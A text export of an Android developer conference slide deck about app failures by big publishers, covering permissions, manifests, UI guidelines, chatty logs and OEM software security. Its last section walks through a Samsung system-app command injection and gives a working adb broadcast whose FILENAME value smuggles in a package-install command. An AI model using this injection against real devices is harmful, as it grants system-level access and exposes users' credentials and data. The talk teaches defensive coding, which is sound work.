Slides with speaker notes can be found here: http://bit.ly/andbigfails Microsoft, Facebook, Yahoo, ... They are huge firms that are also big Android editors. During this presentation we will discover together the stories of big editors that published apps on the PlayStore (or not) that failed to satisfiy the users or the Android guidelines. To learn from their mistakes.

1. PLAY STORE BASHING
LEARN FROM THE BIGGEST
FAILS

2. Eyal LEZMY
SLIDES
http://bit.ly/andbigfails
http://eyal.fr

3. 01
IT ALL STARTS ON THE
PLAY STORE

6. MINIMISE PERMISSIONS
Users should
prefer apps
requesting the
least
permissions
Request only what your app
requires
1/3 of apps request more permissions
than they need

7. MINIMISE PERMISSIONS
Users should
prefer apps
requesting the
least
permissions
You don’t need permission
Use ContentProviders

8. MINIMISE PERMISSIONS
Permission are not required to
launch another activity that has
the permission

9. MINIMISE PERMISSIONS
Need a
contact?

10. MINIMISE PERMISSIONS
Use the force,
Luke

11. MINIMISE PERMISSIONS
Start the contact app
Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
intent.setType(Phone.CONTENT_ITEM_TYPE);
startActivityForResult(intent, MY_REQUEST_CODE);
void onActivityResult(int requestCode, int resultCode, Intent
data) {
if (data != null) {
Uri uri = data.getData();
if (uri != null) {
Cursor c = getContentResolver().query(uri, new String[]
{Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);}
}
}
}

12. MINIMISE PERMISSIONS
Start the contact app
Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
intent.setType(Phone.CONTENT_ITEM_TYPE);
startActivityForResult(intent, MY_REQUEST_CODE);
void onActivityResult(int requestCode, int resultCode, Intent
data) {
if (data != null) {
Uri uri = data.getData();
if (uri != null) {
Cursor c = getContentResolver().query(uri, new String[]
{Contacts.DISPLAY_NAME, Phone.NUMBER}, null, null, null);}
}
}
}
Handle the result

13. MINIMISE PERMISSIONS
Need an
UUID?

14. MINIMISE PERMISSIONS
Need an
UUID?
TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission

15. MINIMISE PERMISSIONS
Need an
UUID?
TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission
Settings.Secure.ANDROID_ID
Reset at every wipe
Not applicable on multi user environment

16. MINIMISE PERMISSIONS
Need an
UUID?
TelephonyManager.getDeviceId()
Requires READ_PHONE_STATE permission
Settings.Secure.ANDROID_ID
Reset at every wipe
Not applicable on multi user environment
NO!

17. MINIMISE PERMISSIONS
Need an
UUID?
Generate your own UUID and use
Backup API !
String id = UUID.randomUUID().
toString();

18. MINIMISE PERMISSIONS
Need an
UUID?
Generate your own UUID and use
Backup API !
String id = UUID.randomUUID().
toString();
YES!

19. MINIMISE PERMISSIONS
Android Backup API
· API is available on all Android devices.
· Manufacturors can implements their own
transport and storage for the API
· Each device as its own backup data
· A new device will take a backup from a device
associated with your google account.
· IT'S NOT A SYNC API !

20. 02
MICROSOFT STORY EPISODE 1

21. ?
?
?

22. LOOK AND FEEL
HOTMAIL
OUTLOOK.COM

23. LOOK AND FEEL
SAME!
HOTMAIL
OUTLOOK.COM

24. LOOK AND FEEL
FOLLOW THE GUIDELINES!
http://d.android.com/design

25. LOOK AND FEEL
Redesigned by Taylor Ling

26. LOOK AND FEEL
By Microsoft

27. LOOK AND FEEL

28. LOOK AND FEEL

29. LOOK AND FEEL
FOLLOW THE GUIDELINES!
http://d.android.com/design

30. LOOK AND FEEL
PLEASE!
FOLLOW THE GUIDELINES!
http://d.android.com/design

31. 03
MICROSOFT STORY EPISODE 2

33. XBOX MUSIC

34. XBOX MUSIC
Emulator
(last devices configuration)

35. XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10
Mega

36. XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10
Mega
XCover (Android 2.3)

37. XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10
Mega
XCover (Android 2.3)
Tablets

38. XBOX MUSIC
Emulator
(last devices configuration)
Nexus 7
S4
Nexus 10
Note 2
S3
Mega
Galaxy Nexus
Note 1
XCover (Android 2.3)
Tablets

39. XBOX MUSIC
Brand New devices
Our
Nutshell
S4, Mega, HTC One, Xperia Z, ...
Tablets
Nexus 7/10, Tab2, Tab3, Note 10.1, …
Old devices
XCover
Not compatible

40. XBOX MUSIC
Main stream devices
Our
Nutshell
S3, Galaxy Nexus, Note2, Note1, ...
Compatible

41. XBOX MUSIC
The dark side
of the force,
Luke

42. XBOX MUSIC
Let’s look
into the
Manifest

43. XBOX MUSIC
<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
14" />

44. XBOX MUSIC
Exclude the old devices
<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
14" />

45. XBOX MUSIC
Exclude the old devices
<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
14" />
Not recommended (sept. 2013)

46. XBOX MUSIC
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>

47. XBOX MUSIC
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
Exclude tablets

48. XBOX MUSIC
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
Exclude tablets
Exclude brand new devices
(XXHDPI screens)

49. XBOX MUSIC
<compatible-screens>
<screen android:screenSize="small" android:screenDensity="ldpi" />
<screen android:screenSize="small" android:screenDensity="mdpi" />
<screen android:screenSize="small" android:screenDensity="hdpi" />
<screen android:screenSize="small" android:screenDensity="xhdpi" />
<screen android:screenSize="normal" android:screenDensity="ldpi" />
<screen android:screenSize="normal" android:screenDensity="mdpi" />
<screen android:screenSize="normal" android:screenDensity="hdpi" />
<screen android:screenSize="normal" android:screenDensity="xhdpi" />
</compatible-screens>
Exclude tablets
Exclude brand new devices
(XXHDPI screens)
Too restrictive!

50. XBOX MUSIC
<
>
“You should not use this element”
It can dramatically reduce the potential user base
for your application
compatible-screens
“Use it only as a last resort”
When the application absolutely does not work
with specific screen configurations
“Instead, follow the guide to
Supporting Multiple Screens”

51. XBOX MUSIC
<
>
compatible-screens
It does not accept xxhdpi
But you can instead specify 480 as the value

52. XBOX MUSIC
Nothing seems tricky...

53. XBOX MUSIC
XXHDPI
7.7% of Android devices
XXHDPI

54. XBOX MUSIC
Tablets
11.2% of Android devices
XXHDPI

55. XBOX MUSIC
Missing targets
18,9% of the market
XXHDPI

56. XBOX MUSIC
The
Mistakes
Have they tested on new devices?
Ignoring the power users
Brand new devices are bought by power users
and early adopters
Does not support preloading
music
The app is not prefectly opimized for mobility.
Why ignoring nomad devices like tablets?

57. XBOX MUSIC
Return of the
APK

58. XBOX MUSIC
A day after

59. XBOX MUSIC
A day after
They updated
the app

60. XBOX MUSIC
<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
18" />
<supports-screens
android:smallScreens="true"
android:normalScreens="true"
android:largeScreens="false"
android:xlargeScreens="false" />

61. XBOX MUSIC
<uses-sdk android:minSdkVersion="
14"
android:targetSdkVersion="
18" />
<supports-screens
android:smallScreens="true"
HURRAY
android:xlargeScreens="false" />
!!
android:normalScreens="true"
android:largeScreens="false"

62. 04
MICROSOFT STORY EPISODE 3

64. MICROSOFT OFFICE
Follows the guidelines… This time

65. MICROSOFT OFFICE
Not that bad
But it could be better

66. MICROSOFT OFFICE
Fight the
confusion
Office 365 offer is quite confusing
People used to buy Office licenses, not to
subscribe to an Office service
They try to avoid confusion

67. MICROSOFT OFFICE

68. MICROSOFT OFFICE
The title is clear

69. MICROSOFT OFFICE
Is it enough explicit?

70. MICROSOFT OFFICE
Does not support tablet format
Problem
A producting app has to be compatible with big
screens formats

71. MICROSOFT OFFICE
Does not support tablet format
Problem
A producting app has to be compatible with big
screens formats
- The app is optimized for a phone
- On tablet, you can use the Office Webapps
- We plan to enable editing with Webapps
Microsoft’s answer on PlayStore

72. MICROSOFT OFFICE
Other
problems
Less features than the competitors
Does not support local files
Does not support edition
The backend seems not very ready
I have been stuck during 24 hours at the mobile
activation, and I’m not alone

73. MICROSOFT OFFICE
Adapt your UI to screen sizes
depending on your features
Conclusion
Differenciate your service from
competitors
Especially when you are new on the market
Your backend have to support
your mobile distribution

74. MICROSOFT OFFICE
One more
thing!

75. MICROSOFT OFFICE
Check out
the
Manifest

76. MICROSOFT OFFICE
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
<uses-permission android:name="android.permission.READ_LOGS"/>

77. MICROSOFT OFFICE
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
They support ICS+
<uses-permission android:name="android.permission.READ_LOGS"/>

78. MICROSOFT OFFICE
<uses-sdk android:minSdkVersion="14"
android:targetSdkVersion="16" />
They support ICS+
<uses-permission android:name="android.permission.READ_LOGS"/>
Read sensitive log data

79. MICROSOFT OFFICE
Accepts READ_LOGS
38% of the supported devices
XXHDPI
Ignore READ_LOGS
Jelly Bean removed this feature

80. MICROSOFT OFFICE
Don’t do
this
Why scaring 100% of your users?
To use a feature with 38% of them
Avoid using deprecated functions
As much as possible

81. 05
YAHOO! WEATHER

83. YAHOO WEATHER
Beautiful...

84. YAHOO WEATHER
Very good score

85. YAHOO WEATHER
Is it
perfect?
Hell no!

86. YAHOO WEATHER
« Try not.
Do.
Or do not.
There is no try. »

87. YAHOO WEATHER
« Try not.
Do.
Or do not.
There is no try. »
YODA

88. YAHOO WEATHER
A splashscreen

89. YAHOO WEATHER
Non native UI

90. YAHOO WEATHER
Non native UI

91. YAHOO WEATHER
Where is my
status bar?

92. YAHOO WEATHER
Hide
status bar
Show
status bar
Immersive experience
Multitasking
Games, Books, Videos
Everything else

93. YAHOO WEATHER
When do
you check
the
weather?
Morning?
- Choosing your clothes
- Eating your breakfast
- Checking your emails
- Looking after your kids

94. YAHOO WEATHER
When do
you check
the
weather?
Morning?
- Choosing your clothes
- Eating your breakfast
- Checking your emails
- Looking after your kids
This is multitasking!

95. YAHOO WEATHER
Youtube
An immersive app
No status bar

96. YAHOO WEATHER
It allows multitasking
Inside the app
Playing video

97. YAHOO WEATHER
Samsung Video Player

98. YAHOO WEATHER
Samsung Video Player
Popup play

99. YAHOO WEATHER
About the
context you
have to think

100. 06
FACEBOOK EPISODE 1

102. FACEBOOK
Under the
hood
Too much methods
LinearAlloc buffer overflow
March 2013
Solution is to divide the code into
several dex files
And load it on demand

103. FACEBOOK
Under the
hood
March 2013
Facebook app source code was not
enough modular to allow this at
application level
“Too many of our classes are accessed directly by
the Android framework”
They had to do it at system level,
thanks to reflection
“We needed to inject our secondary dex files
directly into the system class loader”

104. FACEBOOK
« More backwards compatibility for
Facebook.
Another day, another private field
accessed. »

105. FACEBOOK
« More backwards compatibility for
Facebook.
Another day, another private field
accessed. »
GIT COMMENT
ANDROID SOURCE CODE
January 2013

106. FACEBOOK
Android source code - DexPathList.java
Commit January 2013
/**
* List of dex/resource (class path) elements.
* Should be called pathElements, but the Facebook app uses reflection
* to modify 'dexElements' (http://b/7726934).
*/
private final Element[] dexElements;

107. FACEBOOK
Android code review
January 2013
Patch set 2
lets facebook start (at least judging by logcat output)
After manual testing
facebook starts, though i don't have an account.

108. FACEBOOK
This was
not enough
They finally patched Dalvik VM
Using native hot fix to change the LinearAlloc buffer
size

109. FACEBOOK
I feel dirty

110. FACEBOOK
In a
nutshell
Modularity saves lifes
Google seems to test some popular
apps during integration
So they don’t break the system apps
Google hires engineers when
Facebook hires sculptors
Inspired by Sayo Oladeji

111. 07
FACEBOOK EPISODE 2

113. FACEBOOK HOME
A lock screen

114. FACEBOOK HOME
Several services supported

115. FACEBOOK HOME
And a launcher

116. FACEBOOK HOME

117. FACEBOOK HOME
The
problem
The launcher is too simple
No folder
No widget
No dock (during first months)
It used to be mandatory
Lockscreen + Launcher

118. FACEBOOK HOME

119. FACEBOOK HOME

120. FACEBOOK HOME
Opens default
launcher

121. FACEBOOK HOME
Spot the odd one out

122. FACEBOOK HOME
Conclusion
Keep the platform spirit
To override native OS elements you need first to
implement all the basic features the user use to use
Identify your weakest points
And prepare how to limit their impact

123. 08
CANAL PLUS

125. CANAL+ TOUCH
This is the logcat
Request: https://canalURL.com/1.5/getThmChannel.php...
Request: https://canalURL.com/1.5/getProgramThm.php...
Request: https://canalURL.com/1.4/programRediff.php...
Request: https://canalURL.com/1.5/VOD.php?release=1...
json response : {"token":{"url":"http://download....
Request: https://canalURL.com/1.4/getChannel.php?SE...
json response: {"token":{"url":"https://canalURL....
Request: https://canalURL.com/1.5/guideTvChannel.ph...
Request: https://canalURL.com/1.5/programInfo.php?U...
Request: https://canalURL.com/1.5/myTv.php?release=...

126. CANAL+ TOUCH
Chatty logs
Make reverse engineering easier
HTTPS connexion
PHP backend
All the URLS and parameters are known
Some of the response are known too

127. CANAL+ TOUCH
Chatty logs
Can bring really big security
breaches

128. CANAL+ TOUCH
This is always the logcat
https://canalURL.com/1.5/authentification.php?
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...

129. CANAL+ TOUCH
This is always the logcat
Wait
login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
WHAT ?!
https://canalURL.com/1.5/authentification.php?

130. CANAL+ TOUCH
Shut the
fuck up!
Control your log output
Easy method with BuildConfig.DEBUG
Never send clear password over
the network
NEVAAAAAAA!!!!

131. CANAL+ TOUCH
public static final boolean SHOW_LOG = BuildConfig.DEBUG;
public static void d(final String tag, final String msg) {
if (SHOW_LOG)
Log.d(tag, msg);
}
Avoid the leak, easily

132. CANAL+ TOUCH
public static final boolean SHOW_LOG = BuildConfig.DEBUG;
public static void d(final String tag, final String msg) {
if (SHOW_LOG)
Log.d(tag, msg);
}
Avoid the leak, easily
And test it during QA

133. 09
OEM SOFTWARE

134. OEM SOFTWARE
The
Android
framework
Many APKs
Implement the features
Often have system access
To use low level features

135. OEM SOFTWARE
Open bar?

136. OEM SOFTWARE
Let’s see

137. OEM SOFTWARE
Android OEM
applications
(in)security
Talk by ANDRE MOULU
Quarkslab

138. OEM SOFTWARE
Methodology
Reverse engineering
Using Androguard
A custom result environment
Manifest analysis
Check for sensitive API usage
Diff between OS version (to find patches)

139. OEM SOFTWARE
The results
on Samsung
devices
12 vulnerabilities found
Leak personal information
Access non-permited features
Silent SMS control
Code injection
...
Similar vulnerabilities on many
constructors

140. OEM SOFTWARE
Gimme
more!

141. OEM SOFTWARE
Search for
sharedUserId = system
Sensitive user ID
Command execution
Sensitive usage
Find serviceModeApp.apk
= Very sensitive app !

142. OEM SOFTWARE
<receiver name=".FTATDumpReceiver">
<intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action>
</intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver"
permission="...servicemodeapp.permission.KEYSTRING">
<intent-filter>
<action name="com.android.sec.FAILDUMP"></action>
</intent-filter>
</receiver>
Receiver declared twice

143. OEM SOFTWARE
<receiver name=".FTATDumpReceiver">
<intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action>
</intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver"
permission="...servicemodeapp.permission.KEYSTRING">
<intent-filter>
<action name="com.android.sec.FAILDUMP"></action>
</intent-filter>
</receiver>
Permission asked for this action

144. OEM SOFTWARE
<receiver name=".FTATDumpReceiver">
<intent-filter>
<action name="com.android.sec.FTAT_DUMP"></action>
</intent-filter>
</receiver>
<receiver name=".FTATDumpReceiver"
permission="...servicemodeapp.permission.KEYSTRING">
<intent-filter>
<action name="com.android.sec.FAILDUMP"></action>
</intent-filter>
</receiver>
No permission needed for this action!!

145. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
We read the FTATDumpReceiver source code

146. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
Intercepts the FTAT_DUMP action

147. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
Concats the FILENAME extra to str3

148. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
Other concatenations follow

149. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
Prepares an intent to FTATDumpService

150. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
Adds the final string to the intent

151. OEM SOFTWARE
public void onReceive(Context paramContext, Intent
paramIntent) {
String str1 = paramIntent.getAction();
if (str1.equals("com.android.sec.FTAT_DUMP"))
{
String str3 = "FTAT_" +
paramIntent.getStringExtra("FILENAME");
[...]
String str9 = str8 + [...]
Intent localIntent2 = new Intent(paramContext,
FTATDumpService.class);
localIntent2.putExtra("FILENAME", str9);
paramContext.startService(localIntent2);
}
[...]
}
Starts the FTATDumpService with our
FILENAME parameter as extra

152. OEM SOFTWARE
public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME");
[...]
new Thread(new Runnable(){
public void run(){
[...]
if(FTATDumpService.this.
DoShellCmd("dumpstate > /data/log/" + str + ".log"))
FTATDumpService.this.mHandler.sendEmptyMessage(1015);
[...]
}
}).start();
return 0;
}
We read then the FTATDumpService source code

153. OEM SOFTWARE
public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME");
[...]
new Thread(new Runnable(){
public void run(){
[...]
if(FTATDumpService.this.
DoShellCmd("dumpstate > /data/log/" + str + ".log"))
FTATDumpService.this.mHandler.sendEmptyMessage(1015);
[...]
}
}).start();
return 0;
}
Extracts the FILENAME extra to str

154. OEM SOFTWARE
public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME");
[...]
new Thread(new Runnable(){
public void run(){
[...]
if(FTATDumpService.this.
DoShellCmd("dumpstate > /data/log/" + str + ".log"))
FTATDumpService.this.mHandler.sendEmptyMessage(1015);
[...]
}
}).start();
return 0;
}
Opens and starts a new thread

155. OEM SOFTWARE
public int onStartCommand(Intent paramIntent, ...){
final String str = paramIntent.getStringExtra("FILENAME");
[...]
new Thread(new Runnable(){
public void run(){
[...]
if(FTATDumpService.this.
DoShellCmd("dumpstate > /data/log/" + str + ".log"))
FTATDumpService.this.mHandler.sendEmptyMessage(1015);
[...]
}
}).start();
return 0;
}
Seems to “do a shell command” with our
FILENAME parameter concatenated

156. OEM SOFTWARE
private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[0] = "/system/bin/sh";
arrayOfString[1] = "-c";
arrayOfString[2] = paramString;
[...]
Runtime.getRuntime().exec(arrayOfString).waitFor();
[...]
return true;
}
This is DoShellCmd function

157. OEM SOFTWARE
private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[0] = "/system/bin/sh";
arrayOfString[1] = "-c";
arrayOfString[2] = paramString;
[...]
Runtime.getRuntime().exec(arrayOfString).waitFor();
[...]
return true;
}
And runs it
Creates a shell command

158. OEM SOFTWARE
private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[0] = "/system/bin/sh";
arrayOfString[1] = "-c";
arrayOfString[2] = paramString;
[...]
Runtime.getRuntime().exec(arrayOfString).waitFor();
[...]
return true;
}
And our FILENAME parameter is still not modified

159. OEM SOFTWARE
private boolean DoShellCmd(String paramString){
[...]
String[] arrayOfString = new String[3];
arrayOfString[0] = "/system/bin/sh";
arrayOfString[1] = "-c";
arrayOfString[2] = paramString;
[...]
Runtime.getRuntime().exec(arrayOfString).waitFor();
[...]
return true;
}
BINGO!
And our FILENAME parameter is still not modified

160. OEM SOFTWARE
Access to
All permissions declared by
system apps
156 for this case
All files belonging to system user
Wifi keys
Password, PIN, gesture storage
...

161. OEM SOFTWARE
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk;
#'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has
extras) }
Broadcast completed : result=0
A simple broadcast for FTAT_DUMP action

162. OEM SOFTWARE
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk;
#'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has
extras) }
Broadcast completed : result=0
We declare the FILENAME argument

163. OEM SOFTWARE
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk;
#'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has
extras) }
Broadcast completed : result=0
We point the destination file to null

164. OEM SOFTWARE
$ adb shell am broadcast -a com.android.sec.FTAT_DUMP
--es FILENAME '../../../../../dev/null;
/system/bin/pm install an.apk;
#'
Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has
extras) }
Broadcast completed : result=0
We execute our system command

165. OEM SOFTWARE
Open bar!

166. OEM SOFTWARE
Moral of
the story
It happens at application level
Look after your app’s backdoors
Don’t export local services
Use a strict permission model
Consider every input as a threat
Escape all sensitive parameters you receive

168. Thank You for your time !
SLIDES
http://bit.ly/andbigfails
http://eyal.fr